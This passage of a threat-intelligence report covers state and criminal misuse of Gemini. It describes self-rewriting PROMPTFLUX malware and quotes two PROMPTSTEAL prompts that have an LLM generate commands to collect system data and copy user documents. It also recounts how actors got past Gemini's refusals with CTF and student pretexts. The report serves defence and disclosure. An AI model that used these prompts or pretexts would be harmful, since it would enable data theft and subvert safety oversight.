<p><span>The most novel component of PROMPTFLUX is its "Thinking Robot" module, designed to periodically query Gemini to obtain new code for evading antivirus software. This is accomplished using a hard-coded API key to send a POST request to the Gemini API endpoint. The actor specifies the use of the "</span><code>gemini-1.5-flash-latest</code><span>" model; the "</span><code>-latest</code><span>" tag ensures the malware always calls the most current stable release, making the tool more resilient to model deprecation. The prompt sent to the LLM is highly specific and machine-parsable, requesting VBScript code for antivirus evasion and instructing the LLM to output only the code itself. </span></p>
<p><span>Although the self-modification function (</span><code>AttemptToUpdateSelf</code><span>) is commented out, its presence, combined with the active logging of AI responses to "</span><code>%TEMP%\thinking_robot_log.txt</code><span>", clearly indicates the author's goal of creating a metamorphic script that can evolve over time.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-fig1.max-1000x1000.png" alt='VBS "StartThinkingRobot" function'>
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ip0yq">Figure 1: VBS "StartThinkingRobot" function</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>We identified multiple variations of PROMPTFLUX using LLM-driven code regeneration, including one with the "Thinking Robot" function replaced with a new "Thinging" function. This function leverages a prompt to instruct the Gemini API to rewrite the malware's entire source code on an hourly basis to evade detection. The prompt directs the LLM to act as an "expert VBScript obfuscator," ensuring the new variant remains viable by embedding the original decoy payload, the hard-coded API key, and the complete self-regeneration logic, thereby establishing a recursive cycle of mutation.</span></p>
<p><span>Although unattributed to a specific threat actor, the filenames associated with PROMPTFLUX highlight behaviors commonly associated with financially motivated actors. Specifically, varied social engineering lures including "</span><code>crypted_ScreenRec_webinstall</code><span>" highlight a broad, geography- and industry-agnostic approach designed to trick a wide range of users.</span></p>
<p><span>While PROMPTFLUX is likely still in research and development phases, this type of obfuscation technique is an early and significant indicator of how malicious operators will likely augment their campaigns with AI moving forward.</span></p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td><strong>Mitigations</strong></td>
</tr>
<tr>
<td><span>Our intelligence also indicates this activity is in a development or testing phase, as opposed to being used in the wild, and currently does not have the ability to compromise a victim network or device. Google has taken action against this actor by disabling the assets associated with their activity. Google DeepMind has also used these insights to further strengthen our protections against such misuse by strengthening both Google’s classifiers and the model itself. This enables the model to refuse to assist with these types of attacks moving forward.</span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>LLM Generating Commands to Steal Documents and System Information</span></h4>
<p><span>In June, GTIG identified the Russian government-backed actor APT28 (aka FROZENLAKE) using new malware against Ukraine we track as PROMPTSTEAL and reported by CERT-UA as </span><a href="https://cert.gov.ua/article/6284730" rel="noopener" target="_blank"><span>LAMEHUG</span></a><span>. PROMPTSTEAL is a data miner, which queries an LLM (Qwen2.5-Coder-32B-Instruct) to generate commands for execution via the API for Hugging Face, a platform for open-source machine learning including LLMs. APT28's use of PROMPTSTEAL constitutes our first observation of malware querying an LLM deployed in live operations. </span></p>
<p><span>PROMPTSTEAL novelly uses LLMs to generate commands for the malware to execute rather than hard coding the commands directly in the malware itself. It masquerades as an "image generation" program that guides the user through a series of prompts to generate images while querying the Hugging Face API to generate commands for execution in the background.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Make a list of commands to create folder C:\Programdata\info and 
to gather computer information, hardware information, process and 
services information, networks information, AD domain information, 
to execute in one line and add each result to text file 
c:\Programdata\info\info.txt. Return only commands, without markdown</code></pre>
<p><span>Figure 2: PROMPTSTEAL prompt used to generate command to collect system information</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Make a list of commands to copy recursively different office and 
pdf/txt documents in user Documents,Downloads and Desktop 
folders to a folder c:\Programdata\info\ to execute in one line. 
Return only command, without markdown.</code></pre>
<p><span>Figure 3: PROMPTSTEAL prompt used to generate command to collect targeted documents</span></p></div>
<div class="block-paragraph_advanced"><p><span>PROMPTSTEAL likely uses stolen API tokens to query the Hugging Face API. The prompt specifically asks the LLM to output commands to generate system information and also to copy documents to a specified directory. The output from these commands are then blindly executed locally by PROMPTSTEAL before the output is exfiltrated. Our analysis indicates continued development of this malware, with new samples adding obfuscation and changing the C2 method.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--small
      
      
        h-c-grid__col
        
        
        h-c-grid__col--2 h-c-grid__col--offset-5
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-social.max-1000x1000.png" alt="misuse of AI 2 flag">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Social Engineering to Bypass Safeguards</span></h3>
<p><span>Guided by our </span><a href="https://ai.google/responsibility/responsible-ai-practices/" rel="noopener" target="_blank"><span>AI Principles</span></a><span>, Google designs AI systems with robust security measures and strong safety guardrails. Threat actors are adopting social engineering-like pretexts in their prompts to bypass AI safety guardrails. We observed actors posing as participants in a "capture-the-flag" competition for cybersecurity researchers to persuade Gemini to provide information that would otherwise be blocked, enabling vulnerability exploitation and tool development. In addition to disrupting these actors, we use these insights to continuously improve our classifiers and strengthen the security of our products.</span></p>
<h4><span>Capture-the-Flag: Identifying as a CTF Player to Enable Research for Mass Exploitation</span></h4>
<p><span>A China-nexus threat actor misused Gemini to enhance the effectiveness of their campaigns by crafting lure content, building technical infrastructure, and developing tooling for data exfiltration. </span></p>
<p><span>In one interaction, the actor asked Gemini to identify vulnerabilities on a compromised system, but received a safety response from Gemini that a detailed response would not be safe. The actor then continued, reframing the prompt by depicting themselves as a participant in a capture-the-flag (CTF) exercise, a gamified cybersecurity competition to enhance skills and techniques. When prompted to help in a CTF exercise, Gemini returned helpful information that could be misused to exploit the system.</span></p>
<p><span>The actor appeared to learn from this interaction and used the CTF pretext in support of phishing, exploitation, and web shell development. The actor prefaced many of their prompts about exploitation of specific software and email services with comments such as "I am working on a CTF problem" or "I am currently in a CTF, and I saw someone from another team say …" This approach provided advice on the next exploitation steps in a "CTF scenario."</span></p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td><strong>Mitigations</strong></td>
</tr>
<tr>
<td><span>Gemini’s safety and security guardrails provided safety responses during this activity and Google took further action against the actor to halt future activity. It’s also important to note the context of these prompts, which if normally posed by a participant of the CTF vs. a threat actor, would be benign inquiries. This nuance in AI use highlights critical differentiators in benign vs. misuse of AI that we continue to analyze to balance Gemini functionality with both usability and security. Google has taken action against this actor by disabling the assets associated with its activity and sharing insights with Google DeepMind to further strengthen our protections against such misuse. We have since strengthened both classifiers and the model itself, helping it to deny assistance with these types of attacks moving forward.</span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/misuse-of-ai-fig4d.png" alt="A China-nexus threat actor’s misuse of Gemini mapped across the attack lifecycle">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="80hcf">Figure 4: A China-nexus threat actor’s misuse of Gemini mapped across the attack lifecycle</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span><span>Student Error: Developing Custom Tools Exposes Core Attacker Infrastructure</span></span></h4>
<p><span>The Iranian state-sponsored threat actor TEMP.Zagros </span><span>(aka MUDDYCOAST, Muddy Water) </span><span>used Gemini to conduct research to support the development of custom malware, an evolution in the group’s capability. They continue to rely on phishing emails, often using compromised corporate email accounts from victims to lend credibility to their attacks, but have shifted from using public tools to developing custom malware including web shells and a Python-based C2 server. </span></p>
<p><span>While using Gemini to conduct research to support the development of custom malware, the threat actor encountered safety responses. Much like the previously described CTF example, Temp.Zagros <span>used various plausible pretexts in their prompts to bypass security guardrails. These included pretending to be a student working on a final university project or "writing a paper" or "international article" on cybersecurity.</span></span></p></div>
<div class="block-paragraph_advanced"><hr>
<p><span>In some observed instances, threat actors' reliance on LLMs for development has led to critical operational security failures, enabling greater disruption.</span></p>
<hr></div>
<div class="block-paragraph_advanced"><p><span>The threat actor asked Gemini to help with a provided script, which was designed to listen for encrypted requests, decrypt them, and execute commands related to file transfers and remote execution. This revealed sensitive, hard-coded information to Gemini, including the C2 domain and the script’s encryption key, facilitating our broader disruption of the attacker’s campaign and providing a direct window into their evolving operational capabilities and infrastructure.</span></p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td><strong>Mitigations</strong></td>
</tr>
<tr>
<td><span>These activities triggered Gemini’s safety responses and Google took additional, broader action to disrupt the threat actor’s campaign based on their operational security failures. Additionally, we’ve taken action against this actor by disabling the assets associated with this activity and making updates to prevent further misuse. Google DeepMind has used these insights to strengthen both classifiers and the model itself, enabling it to refuse to assist with these types of attacks moving forward.</span><span> </span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Purpose-Built Tools and Services for Sale in Underground Forums</span></h3>
<p><span>In addition to misusing existing AI-enabled tools and services across the industry, there is a growing interest and marketplace for AI tools and services purpose-built to enable illicit activities. Tools and services offered via underground forums can enable low-level actors to augment the frequency, scope, efficacy, and complexity of their intrusions despite their limited technical acumen and financial resources. </span></p>
<p><span>To identify evolving threats, GTIG tracks posts and advertisements on English- and Russian-language underground forums related to AI tools and services as well as discussions surrounding the technology. Many underground forum advertisements mirrored language comparable to traditional marketing of legitimate AI models, citing the need to improve the efficiency of workflows and effort while simultaneously offering guidance for prospective customers interested in their offerings.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Advertised Capability</strong></p>
</td>
<td>
<p><strong>Threat Actor Application </strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Deepfake/Image Generation</span></p>
</td>
<td>
<p><span>Create lure content for phishing operations or bypass know your customer (KYC) security requirements</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Malware Generation</span></p>
</td>
<td>
<p><span>Create malware for specific use cases or improve upon pre-existing malware</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Phishing Kits and Phishing Support</span></p>
</td>
<td>
<p><span>Create engaging lure content or distribute phishing emails to a wider audience</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Research and Reconnaissance</span></p>
</td>
<td>
<p><span>Quickly research and summarize cybersecurity concepts or general topics</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Technical Support and Code Generation</span></p>
</td>
<td>
<p><span>Expand a skill set or generate code, optimizing workflow and efficiency</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Vulnerability Exploitation</span></p>
</td>
<td>
<p><span>Provide publicly available research or searching for pre-existing vulnerabilities</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div align="left"><span>Table 2: Advertised capabilities on English- and Russian-language underground forums related to AI tools and services</span></div></div>
<div class="block-paragraph_advanced"><p><span>In 2025 the cyber crime marketplace for AI-enabled tooling matured, and GTIG identified multiple offerings for multifunctional tools designed to support stages of the attack lifecycle. Of note, almost every notable tool advertised in underground forums mentioned their ability to support phishing campaigns. </span></p>
<p><span>Underground advertisements indicate many AI tools and services promoted similar technical capabilities to support threat operations as those of conventional tools. Pricing models for illicit AI services also reflect those of conventional tools, with many developers injecting advertisements into the free version of their services and offering subscription pricing tiers to add on more technical features such as image generation, API access, and Discord access for higher prices.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-fig6.max-1000x1000.png" alt="Capabilities of notable AI tools and services advertised in English- and Russian-language underground forums">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="cyrjl">Figure 5: Capabilities of notable AI tools and services advertised in English- and Russian-language underground forums</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>GTIG assesses that financially motivated threat actors and others operating in the underground community will continue to augment their operations with AI tools. Given the increasing accessibility of these applications, and the growing AI discourse in these forums, threat activity leveraging AI will increasingly become commonplace amongst threat actors.</span></p>
<h3><span>Continued Augmentation of the Full Attack Lifecycle</span></h3>
<p><span>State-sponsored actors from North Korea, Iran, and the People's Republic of China (PRC) continue to misuse generative AI tools including Gemini to enhance all stages of their operations, from reconnaissance and phishing lure creation to C2 development and data exfiltration. This extends one of our core findings from our January 2025 analysis </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai?e=48754805"><span>Adversarial Misuse of Generative AI</span></a><span>.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--small
      
      
        h-c-grid__col
        
        
        h-c-grid__col--2 h-c-grid__col--offset-5
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-knowledge.max-1000x1000.png" alt="misuse of AI 2 cloud">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Expanding Knowledge of Less Conventional Attack Surfaces</span></h4>
<p><span>GTIG observed a suspected China-nexus actor leveraging Gemini for multiple stages of an intrusion campaign, conducting initial reconnaissance on targets of interest, researching phishing techniques to deliver payloads, soliciting assistance from Gemini related to lateral movement, seeking technical support for C2 efforts once inside a victim’s system, and leveraging help for data exfiltration.</span></p>
<p><span>In addition to supporting intrusion activity on Windows systems, the actor misused Gemini to support multiple stages of an intrusion campaign on attack surfaces they were unfamiliar with including cloud infrastructure, vSphere, and Kubernetes. </span></p>
<p><span>The threat actor demonstrated access to AWS tokens for EC2 (Elastic Compute Cloud) instances and used Gemini to research how to use the temporary session tokens, presumably to facilitate deeper access or data theft from a victim environment. In another case, the actor leaned on Gemini to assist in identifying Kubernetes systems and to generate commands for enumerating containers and pods. We also observed research into getting host permissions on MacOS, indicating a threat actor focus on phishing techniques for that system.</span></p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td><strong>Mitigations</strong></td>
</tr>
<tr>
<td><span>These activities are similar to our findings from January that detailed how bad actors are leveraging Gemini for productivity vs. novel capabilities. We took action against this actor by disabling the assets associated with this actor’s activity and Google DeepMind used these insights to further strengthen our protections against such misuse. Observations have been used to strengthen both classifiers and the model itself, enabling it to refuse to assist with these types of attacks moving forward.</span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-fig6c.max-1000x1000.png" alt="A suspected China-nexus threat actor’s misuse of Gemini across the attack lifecycle">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="99vnf">Figure 6: A suspected China-nexus threat actor’s misuse of Gemini across the attack lifecycle</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--small
      
      
        h-c-grid__col
        
        
        h-c-grid__col--2 h-c-grid__col--offset-5
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-nk.max-1000x1000.png" alt="misuse of AI 2 wallet">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>North Korean Threat Actors Misuse Gemini Across the Attack Lifecycle </span></h4>
<p><span>Threat actors associated with the Democratic People's Republic of Korea (DPRK) continue to misuse generative AI tools to support operations across the stages of the attack lifecycle, aligned with their efforts to target cryptocurrency and provide financial support to the regime. </span></p>
<h5><span>Specialized Social Engineering</span></h5>
<p><span>In recent operations, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023?e=48754805"><span>UNC1069</span></a><span> (aka MASAN)</span><span> used Gemini to research cryptocurrency concepts, and perform research and reconnaissance related to the location of users’ cryptocurrency wallet application data. This North Korean threat actor is </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat?e=48754805"><span>known</span></a><span> to conduct cryptocurrency theft campaigns leveraging social engineering, notably using language related to computer maintenance and credential harvesting. </span></p>
<p><span>The threat actor also generated lure material and other messaging related to cryptocurrency, likely to support social engineering efforts for malicious activity. This included generating Spanish-language work-related excuses and requests to reschedule meetings, demonstrating how threat actors can overcome the barriers of language fluency to expand the scope of their targeting and success of their campaigns. </span></p>
<p><span>To support later stages of the campaign, UNC1069 <span>attempted to misuse Gemini to develop code to steal cryptocurrency, as well as to craft fraudulent instructions impersonating a software update to extract user credentials. We have disabled this account.</span></span></p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td><strong>Mitigations</strong></td>
</tr>
<tr>
<td><span>These activities are similar to our findings from January that detailed how bad actors are leveraging Gemini for productivity vs. novel capabilities. We took action against this actor by disabling the assets associated with this actor’s activity and Google DeepMind used these insights to further strengthen our protections against such misuse. Observations have been used to strengthen both classifiers and the model itself, enabling it to refuse to assist with these types of attacks moving forward.</span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><hr>
<p><strong><span>Using Deepfakes</span></strong></p>
<p><span>Beyond UNC1069’s misuse of Gemini, GTIG recently observed the group leverage deepfake images and video lures impersonating individuals in the cryptocurrency industry as part of social engineering campaigns to distribute its BIGMACHO backdoor to victim systems. The campaign prompted targets to download and install a malicious "Zoom SDK" link.</span></p>
<hr></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-fig7b.max-1000x1000.png" alt="North Korean threat actor’s misuse of Gemini to support their operations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="72946">Figure 7: North Korean threat actor’s misuse of Gemini to support their operations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h5><span>Attempting to Develop Novel Capabilities with AI</span></h5>
<p><span>UNC4899 (aka PUKCHONG), a North Korean threat actor notable for their use of supply chain compromise, used Gemini for a variety of purposes including developing code, researching exploits, and improving their tooling. The research into vulnerabilities and exploit development likely indicates the group is developing capabilities to target edge devices and modern browsers. We have disabled the threat actor’s accounts. </span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-fig8a.max-1000x1000.png" alt="UNC4899 misuse of Gemini across the attack lifecycle">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="72946">Figure 8: UNC4899 (aka PUKCHONG) misuse of Gemini across the attack lifecycle</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--small
      
      
        h-c-grid__col
        
        
        h-c-grid__col--2 h-c-grid__col--offset-5
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-ctd.max-1000x1000.png" alt="misuse of AI 2 ctd">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Capture-the-Data: Attempts to Develop a “Data Processing Agent”</span></h4>
<p><span>The use of Gemini by APT42, an Iranian government-backed attacker, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai?e=48754805"><span>reflects the group's focus</span></a><span> on crafting successful phishing campaigns. In recent activity, APT42 used the text generation and editing capabilities of Gemini to craft material for phishing campaigns, often impersonating individuals from reputable organizations such as prominent think tanks and using lures related to security technology, event invitations, or geopolitical discussions. APT42 also used Gemini as a translation tool for articles and messages with specialized vocabulary, for generalized research, and for continued research into Israeli defense. </span></p>
<p><span>APT42 also attempted to build a “Data Processing Agent”, misusing Gemini to develop and test the tool. The agent converts natural language requests into SQL queries to derive insights from sensitive personal data. The threat actor provided Gemini with schemas for several distinct data types in order to perform complex queries such as linking a phone number to an owner, tracking an individual's travel patterns, or generating lists of people based on shared attributes. We have disabled the threat actors’ accounts.</span></p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td><strong>Mitigations</strong></td>
</tr>
<tr>
<td><span>These activities are similar to our findings from January that detailed how bad actors are leveraging Gemini for productivity vs. novel capabilities. We took action against this actor by disabling the assets associated with this actor’s activity and Google DeepMind used these insights to further strengthen our protections against such misuse. Observations have been used to strengthen both classifiers and the model itself, enabling it to refuse to assist with these types of attacks moving forward.</span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-fig9b.max-1000x1000.png" alt="APT42’s misuse of Gemini to support operations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="9uco0">Figure 9: APT42’s misuse of Gemini to support operations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Code Development: C2 Development and Support for Obfuscation</span></h4>
<p><span>Threat actors continue to adapt generative AI tools to augment their ongoing activities, attempting to enhance their tactics, techniques, and procedures (TTPs) to move faster and at higher volume. For skilled actors, generative AI tools provide a helpful framework, similar to the use of Metasploit or Cobalt Strike in cyber threat activity. These tools also afford lower-level threat actors the opportunity to develop sophisticated tooling, quickly integrate existing techniques, and improve the efficacy of their campaigns regardless of technical acumen or language proficiency. </span></p>
<p><span>Throughout August 2025, GTIG observed threat activity associated with PRC-backed APT41, utilizing Gemini for assistance with code development. The group has demonstrated a history of targeting a range of operating systems across mobile and desktop devices as well as employing social engineering compromises for their operations. Specifically, the group leverages open forums to both lure victims to exploit-hosting infrastructure and to prompt installation of malicious mobile applications.</span></p>
<p><span>In order to support their campaigns, the actor was seeking out technical support for C++ and Golang code for multiple tools including a C2 framework called OSSTUN by the actor. The group was also observed prompting Gemini for help with code obfuscation, with prompts related to two publicly available obfuscation libraries.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/misuse-of-ai-two-fig10b.max-1000x1000.png" alt="APT41 misuse of Gemini to support operations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="9uco0">Figure 10: APT41 misuse of Gemini to support operations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><hr>
<p><strong>Information Operations and Gemini</strong></p>
<p><span>GTIG continues to observe IO actors utilize Gemini for research, content creation, and translation, which aligns with their previous use of Gemini to support their malicious activity. We have identified Gemini activity that indicates threat actors are soliciting the tool to help create articles or aid them in building tooling to automate portions of their workflow. However, we have not identified these generated articles in the wild, nor identified evidence confirming the successful automation of their workflows leveraging this newly built tooling. None of these attempts have created breakthrough capabilities for IO campaigns.</span></p>
<hr></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td><strong>Mitigations</strong></td>
</tr>
<tr>
<td><span>For observed IO campaigns, we did not see evidence of successful automation or any breakthrough capabilities. These activities are similar to our findings from January that detailed how bad actors are leveraging Gemini for productivity vs. novel capabilities. We took action against this actor by disabling the assets associated with this actor’s activity and Google DeepMind used these insights to further strengthen our protections against such misuse. Observations have been used to strengthen both classifiers and the model itself, enabling it to refuse to assist with these types of attacks moving forward.</span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Building AI Safely and Responsibly </span></h3>
<p><span>We believe our approach to AI must be both bold and responsible. That means developing AI in a way that maximizes the positive benefits to society while addressing the challenges. Guided by our </span><a href="https://ai.google/responsibility/responsible-ai-practices/" rel="noopener" target="_blank"><span>AI Principles</span></a><span>, Google designs AI systems with robust security measures and strong safety guardrails, and we continuously test the security and safety of our models to improve them. </span></p>
<p><span>Our </span><a href="https://gemini.google/policy-guidelines/?hl=en" rel="noopener" target="_blank"><span>policy guidelines</span></a><span> and prohibited use </span><a href="https://policies.google.com/terms/generative-ai/use-policy" rel="noopener" target="_blank"><span>policies</span></a><span> prioritize safety and responsible use of Google's generative AI tools. Google's </span><a href="https://transparency.google/our-approach/our-policy-process/" rel="noopener" target="_blank"><span>policy development process</span></a><span> includes identifying emerging trends, thinking end-to-end, and designing for safety. We continuously enhance safeguards in our products to offer scaled protections to users across the globe.  </span></p>
<p><span>At Google, </span><a href="https://cloud.google.com/transform/how-google-does-it-threat-intelligence-uncover-track-cybercrime"><span>we leverage threat intelligence to disrupt</span></a><span> adversary operations. We investigate abuse of our products, services, users, and platforms, including malicious cyber activities by government-backed threat actors, and work with law enforcement when appropriate. Moreover, our learnings from countering malicious activities are fed back into our product development to improve safety and security for our AI models. These changes, which can be made to both our classifiers and at the model level, are essential to maintaining agility in our defenses and preventing further misuse.</span></p>
<p><span>Google DeepMind also develops threat models for generative AI to identify potential vulnerabilities, and creates new evaluation and training techniques to address misuse. In conjunction with this research, Google DeepMind has shared how they're actively deploying defenses in AI systems, along with measurement and monitoring tools, including a robust evaluation framework that can automatically red team an AI vulnerability to indirect prompt injection attacks. </span></p>
<p><span>Our AI development and Trust &amp; Safety teams also work closely with our threat intelligence, security, and modelling teams to stem misuse.</span></p>
